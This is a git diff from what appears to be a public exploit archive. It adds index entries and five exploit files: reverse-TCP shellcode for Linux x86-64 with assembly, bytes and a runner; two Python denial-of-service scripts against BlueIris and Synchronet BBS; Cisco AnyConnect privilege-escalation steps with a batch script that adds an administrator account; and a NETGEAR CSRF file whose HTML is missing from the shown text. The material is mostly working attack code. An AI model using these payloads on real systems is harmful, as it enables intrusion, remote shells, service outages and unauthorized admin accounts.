diff --git a/files.csv b/files.csv
index 5338845f8..b363ee91b 100644
--- a/files.csv
+++ b/files.csv
@@ -5384,6 +5384,8 @@ id,file,description,date,author,platform,type,port
41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
+41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
+41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8820,6 +8822,7 @@ id,file,description,date,author,platform,type,port
41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
+41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15920,6 +15923,7 @@ id,file,description,date,author,platform,type,port
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37387,3 +37391,4 @@ id,file,description,date,author,platform,type,port
41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
+41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
diff --git a/platforms/hardware/webapps/41472.html b/platforms/hardware/webapps/41472.html
new file mode 100755
index 000000000..c30fe2053
--- /dev/null
+++ b/platforms/hardware/webapps/41472.html
@@ -0,0 +1,26 @@
+# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
+# Date: 2017-02-28
+# Exploit Author: SivertPL
+# Vendor Homepage: http://netgear.com/
+# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
+# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
+# Tested on: DGN2200v1,v2,v3,v4
+
+# CVE: CVE-2017-6366
+
+A quite dangerous CSRF was discovered on all DGN2200 firmwares.
+When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.
+
+
+
+ netgear router CSRF
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/linux/shellcode/41477.c b/platforms/linux/shellcode/41477.c
new file mode 100755
index 000000000..0e831f79a
--- /dev/null
+++ b/platforms/linux/shellcode/41477.c
@@ -0,0 +1,80 @@
+/*
+ Title: Linux/x86-64 - Reverse TCP shellcode - 84 bytes
+ Author: Manuel Mancera (@sinkmanu)
+ Tested on: 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
+GNU/Linux
+
+----------------- Assembly code -------------------
+
+section .text
+ global _start
+
+_start:
+ push 0x2d01a8c0 ; Address (192.168.1.45)
+ push word 0x5c11 ; Port (4444)
+ push word 2 ; Address family -
+AF_INET (0x2)
+ push 42 ; connect syscall
+ push byte 16 ; length
+ push byte 41 ; socket syscall
+ push byte 1 ; type - SOCK_STREAM (0x1)
+ push byte 2 ; family - AF_INET (0x2)
+
+ pop rdi ; family
+ pop rsi ; type
+ xor rdx, rdx ; protocol
+ pop rax ; socket syscall
+ syscall
+
+ mov rdi, rax ; sockfd
+ pop rdx ; length
+ pop rax ; connect syscall
+ mov rsi, rsp ; sockaddr
+ syscall
+
+ xor rsi, rsi
+loop:
+ mov al, 33
+ syscall
+ inc rsi
+ cmp rsi, 2
+ jle loop
+
+ xor rax, rax
+ mov rdi, 0x68732f6e69622f2f
+ xor rsi, rsi
+ push rsi
+ push rdi
+ mov rdi, rsp
+ xor rdx, rdx
+ mov al, 59
+ syscall
+
+
+---------------------------------------------------
+$ nasm -f elf64 reverse-tcp-shell.asm -o reverse-tcp-shell.o
+$ ld reverse-tcp-shell.o -o reverse-tcp-shell
+$ objdump -d ./reverse-tcp-shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
+-d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
+/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+"\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05"
+$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+$ ./shellcode
+Length: 84 bytes
+
+*/
+
+
+#include
+#include
+
+const char code[] = \
+"\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
+
+int main()
+{
+ printf("Length: %d bytes\n", strlen(code));
+ (*(void(*)()) code)();
+ return 0;
+}
+
diff --git a/platforms/windows/dos/41474.py b/platforms/windows/dos/41474.py
new file mode 100755
index 000000000..369590be5
--- /dev/null
+++ b/platforms/windows/dos/41474.py
@@ -0,0 +1,31 @@
+import socket
+
+
+# Title: BlueIris - Denial of Service
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://blueirissoftware.com/blueiris.exe
+# Version: 4.5.1.4
+# Tested on: Windows Server 2008 R2 Standard x64
+
+
+# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.
+
+buffer = "A"*5000
+port = 21
+s = socket.socket()
+ip = '0.0.0.0'
+s.bind((ip, port))
+s.listen(5)
+
+
+print 'Listening on FTP port: '+str(port)
+
+while True:
+ conn, addr = s.accept()
+ conn.send('220 '+buffer+'\r\n')
+ conn.recv(1024)
+ conn.send('250 '+buffer+'\r\n')
+ conn.close()
+
diff --git a/platforms/windows/dos/41475.py b/platforms/windows/dos/41475.py
new file mode 100755
index 000000000..54cc6f1bb
--- /dev/null
+++ b/platforms/windows/dos/41475.py
@@ -0,0 +1,82 @@
+# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
+# Version: 3.16c for Windows
+# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64
+# CVE : CVE-2017-6371
+
+import socket
+import time
+import sys
+
+try:
+ host = sys.argv[1]
+ port = 80
+except IndexError:
+ print "[+] Usage %s " % sys.argv[0]
+ sys.exit()
+
+
+exploit = "\x41"*4096
+
+buffer = "GET /index.ssjs HTTP/1.1\r\n"
+buffer+= "Host: 192.168.198.129\r\n"
+buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
+r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Accept-Encoding: gzip, deflate\r\n"
+buffer+="Referer: "+exploit+"\r\n"
+buffer+="Connection: keep-alive\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="Content-Length: 5900\r\n\r\n"
+
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down\r\n")
+ break
+
+
+print("[i] Waiting a few seconds before starting a second attack.\r\n")
+time.sleep(25)
+print("[*] Second run to trigger the DoS")
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down.\r\n")
+ break
+
+print("[i] Wait before the final strike.\r\n")
+time.sleep(25)
+print("[*] Third run to trigger the DoS")
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down.\r\n")
+ print("[!] It can take a few seconds for the service to crash\r\n")
+ break
+
diff --git a/platforms/windows/local/41476.txt b/platforms/windows/local/41476.txt
new file mode 100755
index 000000000..f3c00359c
--- /dev/null
+++ b/platforms/windows/local/41476.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Cisco AnyConnect Start Before Logon (SBL) local privilege escalation. CVE-2017-3813
+# Date: 02/27/2017
+# Exploit Author: @Pcchillin
+# Software Link: http://www.cisco.com/c/en/us/support/security/anyconnect-secure-mobility-client/tsd-products-support-series-home.html
+# Version: 4.3.04027 and earlier
+# Tested on: Windows 10
+# CVE : CVE-2017-3813
+# Vendor ID : cisco-sa-20170208-anyconnect
+
+
+#Run CMD.EXE with system privileges
+1. Start Cisco anyconnect from logon screen.
+2. Once the Cisco app comes up (where you can select a profile and hit connect) hold CTRL and hit B.
+3. When the Cisco about window appears then select the URL at the bottom. This will open Internet Explorer or you can select Chrome if installed.
+4. Once Internet Explorer is started press CTRL-O, then select browse. Chrome press CTRL-O and explorer will open.
+5. You can then navigate to the C:\Windows\System32\ folder and find CMD.exe then right click and select RunAsAdministrator.
+
+
+#Run scripts from USB flash drive
+Follow steps from above and navigate to the flash drive right click and select run. You can also edit the document.
+Example bat script:
+Net user #USERNAME #PASSWORD /add
+Net localgroup administrators #USERNAME /add
+
+
+#Vendor link to advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170208-anyconnect
+#Twitter handle @pcchillin
\ No newline at end of file